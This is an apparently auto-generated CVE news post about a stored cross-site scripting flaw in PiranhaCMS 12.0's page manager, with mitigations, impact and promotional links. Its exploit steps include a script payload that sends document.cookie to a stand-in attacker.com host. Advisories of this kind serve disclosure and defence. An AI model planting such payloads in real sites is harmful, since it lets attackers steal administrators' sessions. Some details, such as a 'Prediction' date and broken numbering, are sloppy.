PiranhaCMS, Stored Cross-site Scripting, CVE-2025-XXXXX (Moderate)

By /

Listen to this Post

The CVE-2025-XXXXX vulnerability in PiranhaCMS 12.0 is a stored cross-site scripting (XSS) flaw located within the page management functionality. The vulnerability exists because the application does not properly sanitize user-supplied input before storing it and subsequently rendering it within the user’s browser. Specifically, an attacker with permissions to create or edit pages, such as a contributor-level user, can inject malicious JavaScript code into the ‘Text’ content block of a Standard or Standard Archive Page via the `/manager/pages` endpoint. This injected payload is then permanently stored (stored) on the server. When an administrative or any other privileged user views the compromised page in the manager interface, the malicious script is executed within their browser session. This execution occurs in the context of the victim user, potentially allowing the attacker to steal session cookies, perform actions on behalf of the user, or deface the website.
Platform: PiranhaCMS
Version: 12.0
Vulnerability: Stored XSS
Severity: Moderate

date: 2024-09-26

Prediction: 2024-10-10

What Undercode Say:

`curl -s “https://api.github.com/advisories?query=PiranhaCMS” | jq ‘.[] | select(.severity==”moderate”)’`

`grep -r “innerHTML” /var/www/piranha/manager/`

``

How Exploit:

  1. Attacker logs into the CMS with contributor credentials.

2. Navigates to `/manager/pages` and edits a page.

  1. Inserts a malicious script tag into a Text content block: <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>.
  2. Saves the page. The payload is now stored.
  3. When an administrator views the page list or edits the page, the script executes.

Protection from this CVE

  • Sanitize all user input on the server-side before storage.
  • Implement a Content Security Policy (CSP) header.
  • Encode output when rendering user-controlled data in the browser.
  • Apply the principle of least privilege for user roles.

Impact:

  • Session Hijacking
  • Privilege Escalation
  • Account Takeover
  • Website Defacement

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top